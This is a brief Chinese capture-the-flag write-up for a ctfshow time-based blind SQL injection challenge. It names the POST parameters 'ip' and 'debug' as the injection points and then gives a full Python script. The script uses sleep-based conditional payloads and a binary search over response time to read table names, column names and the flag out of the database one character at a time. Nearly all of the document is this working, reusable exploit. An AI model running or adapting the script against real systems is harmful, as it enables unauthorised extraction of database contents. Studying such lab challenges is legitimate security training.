214 基础时间盲注

这道题很裂开啊,没有给注入点,懒得用arjun扫描了…
注入点在post传参ip和debug
直接给脚本

  1. import requests
  2. import time
  3. url = "http://f889edc3-5471-4dba-a9c1-7b2cb3c9cb14.challenge.ctf.show/api/"
  4. #表名
  5. #payload1="1 or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1)"
  6. #payload1="1 or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{},1))>{},sleep(1),1)"
  7. payload1="1 or if(ascii(substr((select group_concat(flaga) from ctfshow_flagx),{},1))>{},sleep(1),1)"
  8. flag = ""
  9. for i in range(1,100):
  10.     head = 32
  11.     tail = 127
  12.     while not (abs(head-tail) == 1 or head == tail):
  13.         mid = (head + tail) >> 1
  14.         data = {
  15.             "ip" : payload1.format(i,mid),
  16.             'debug' : 1
  17.         }
  18.         #print(data)
  19.         start_time = time.time()
  20.         response = requests.post(url,data=data)
  21.         end_time = time.time()
  22.         #print(end_time - start_time)
  23.         if(end_time - start_time > 1):
  24.             head = mid
  25.         else:
  26.             tail = mid
  27.     if tail < head:
  28.         tail = head
  29.     flag = flag + chr(tail)
  30.     print("[*]flag:"+flag)